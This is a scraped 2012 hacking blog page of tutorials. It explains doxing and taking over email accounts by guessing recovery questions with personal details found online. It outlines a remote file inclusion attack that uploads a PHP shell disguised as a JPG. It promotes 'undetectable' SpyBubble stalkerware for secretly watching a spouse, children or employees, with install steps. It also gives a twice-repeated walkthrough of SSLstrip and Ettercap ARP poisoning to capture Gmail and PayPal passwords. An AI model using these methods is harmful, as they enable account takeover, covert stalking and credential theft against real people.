First, let me explain what Doxing is. Doxing is the process of gaining information about someone or something by using sources on the Internet and using basic deduction skills. Its name is derived from “Documents” and in short it is the retrieval of “Documents” on a person or company.
You’re probably thinking, “Okay, so basically it’s getting information from searching someone’s email on Google right?” in a sense yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website called Pipl (http://www.pipl.com/). Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use is Facebook (http://www.facebook.com). Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its email search.
The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your passport online; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it into Facebook or Pipl and he will be able to find you, assuming the email he has is connected to some account you have online. On the flipside of this, in order to find your email, the hacker either has to guess your email, befriend you on Facebook,or, hack one of your vulnerable friends and view your email that way. Once he’s done that, you’re in trouble.
Now, you’re probably thinking, “How’s he going to hack me with just my email?” well, that’s where Doxing comes in handy. If he can view your Facebook account, or he can find some other bit of information about you using Pipl, he can do what’s called reverting. Reverting is the process of using the target’s email’s recovery questions to gain access to the target’s email. Now, you may be thinking, “How’s he gonna guess my recovery question answers?” well, take a second look at your recovery questions and ask yourself, “Can someone find this answer online?” If you answered yes, then you’re vulnerable to reverting.
Any hacker reading this, that didn't previously know about reverting, would probably look at this and say
“This would never work!” but you have to remember… we’re all humans, and we all make mistakes. Surprisingly, this method works more often than you’d think, but it is not for anyone who is lazy. Doxers tend to spend a while searching around the web for information that they can use.
Chances are, you’ve made some mistakes online, and if a skilled Doxer finds that mistake, then you’re in trouble. The Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws.”
How can you insure that you won’t be Doxed? Well, as the Internet becomes more and more useful and addicting, it will become harder to not get Doxed. The main issue for most victims is their security questions, and their password security. If a victim has a very easy-to-find recovery question, then the victim will be easily reverted within a matter of seconds. Also, if the victim has a simple password, it could get brute forced simply by using a wordlist that applies to the victim’s interests, likes, and fancies (of course, this method is not as popular).
So, the main rule to not getting hacked is: Have secure passwords, and almost impossible to guess recovery questions. The main rule to not getting Doxed is… to just stay off the Internet; but, who wants to do that?
Monday, April 16, 2012
Facebook Hacking: Remote File Inclusion Attack By Anzul Aqueel Soherwardi
Facebook Hacking: Remote File Inclusion Attack By Anzul Aqueel Soherwardi
Facebook being the world's largest social networking website has became the major target for the hackers, attackers and other malicious users. Facebook has hired the team world's leading security experts in order for them to improve their website's security. Moreover facebook also pays 500$ to any one who can identify any sort of vulnerability inside facebook.
The facebook security team has done a very great job in improving and taking facebook's security to the maximum level. However, the problem is that Facebook applications are not coded or monitored by facebook, and it's also not possible that facebook to monitor every single app for vulnerabilities. These facebook apps are mostly coded by common programmers who are not well aware of how a code is written securely. Which leaves facebook apps poured with common vulnerabilities like XSS ( CROSS SITE SCRIPTING), Clickjacking, Remote file inclusion etc.
Out of all of these web application vulnerabilities, Remote file inclusion is a very common web application attack which occurs because the application is not able to validate included files. According to imperva, 21% of the apps on facebook are vulnerable to remote file inclusion attack.
Here is how the attack is carried out:
Step 1 - The attacker creates a malicious jpg file, because the upload of PHP is mostly banned on webservers with user level privileges. Therefore the hacker renames a PHP shell to some thing like shell.php.jpg in order to upload it to the webserver.
Step 2 - Next the hacker exploits RFI vulnerability in order to reference malicious JPG, which paramtere is something like.
.php?page=url of your malicious image
Step 3 - Next the attacker takes control of the server by just going to the url of the JPG image.
Mitigation:
Imperva suggests a four step mitigation process which can be found inside the image below, However it includes the deployment of web application firewall, but what if some one is not using a WAF, However will he be protected.
How To Spy A Mobile Phone? - CellPhone Spying Software By Anzul Aqueel Soherwardi
How To Spy A Mobile Phone? - CellPhone Spying Software By Anzul Aqueel Soherwardi
Have you ever wanted to spy on your spouse, kids, friends or employees? Or just play ''Secret Service'' 'cause you know, restraining order can only get you so close?! You certainly are in for a treat. Now, you can play make-belief all you want with a software that works just as well.
SpyBubble is a software that allows you to log in from any computer and access any smartphone that it is installed on. Through SpyBubble, you can monitor and supervise any smartphone simply by entering your login username and password.
SpyBubble has the following features that can be very useful in certain situations:
Call Tracking
1. Access call logs and see how many calls were received and answered on the smartphone, how many calls were made on specific numbers, at what time and the duration they lasted.SMS Tracking
2. Sent and received messages are saved into your SpyBubble account as they are generated, so you can read them even if they are deleted from the smartphone.GPS Location Tracking
3. Using SpyBubble you can pinpoint the exact position of the phone (and the person using it) via Google Maps.Phone Book Access
4. Every phone number saved in the smartphone memory can be viewed through SpyBubble.Email Tracking
5. Incoming and outgoing emails are saved and can be seen via Email Tracking.URL Tracking
6. SpyBubble let's you view the user's browsing history.Photo Tracking
7. All photos sent and received on the phone are logged into SpyBubble website where you can view them.For a detailed list of the smartphones SpyBubble supports, please click here.
How To Download And Install SpyBubble On A Smartphone:
Step 1. Open the Web Browser on your target phone and type in the following address and press Enter.
http://www.spybubble.com/symbian/sbubble.sis
Step 2. The download process will then start.
Step 3. When prompted to install SpyBubble, click on Yes and then on Continue as shown in the following screenshots.
Step 4. After SpyBubble has been installed, you will see the following screen. Switch the phone off and then on.
Step 5. Register your license key as shown below.
To get you license key, go to: SpyBubble Setting Page (you may have to log into the system first) You can also go to the member control panel and click on the Configuration menu to get it.
Step 6: Log in to SpyBubble Login Panel to verify if your account is working flawlessly.
Irresistable Features include:
- Has GPS tracking.
- Can spy on text messages.
- Can get contact book info from phone.
- Can check out call log.
- Popular Smart Phones supported.
- Can be used to back up your own phone’s information.
- 100% undetectable.
Cheers!
Man In The Middle Attack - SSL Hacking By Anzul Aqueel Soherwardi
...........................
One of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer Protocol Secure (HTTPS) It is a combination of the Hypertext Transfer Protocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate
In this tutorial I will teach how to carry out a successful Mitm attack
Concept :-
We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip
Read More: What is SSL(Secure Socket Layer)
Thing we Need
1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial
2. Ettercap to carry out mitm attacks
Demonstration :-
1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok
2. Now select the victim’s IP and click open
3. Now open ettercap go to
4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2
5. Now select mitm-arp poisoning and click ok as shown
6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTPand not HTTPS Hence we are able to get the User id ,passwords as shown below
Counter measures:
1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS
2. Always check the SSL certificate before doing an online transaction
Man In The Middle Attack - SSL Hacking By Anzul Aqueel Soherwardi
One of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer Protocol Secure (HTTPS) It is a combination of the Hypertext Transfer Protocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate
In this tutorial I will teach how to carry out a successful Mitm attack
Concept :-
We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip
Read More: What is SSL(Secure Socket Layer)
Thing we Need
1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial
2. Ettercap to carry out mitm attacks
Demonstration :-
1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok
2. Now select the victim’s IP and click open
3. Now open ettercap go to
4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2
5. Now select mitm-arp poisoning and click ok as shown
6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTPand not HTTPS Hence we are able to get the User id ,passwords as shown below
Counter measures:
1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS
2. Always check the SSL certificate before doing an online transaction
Subscribe to:
Posts (Atom)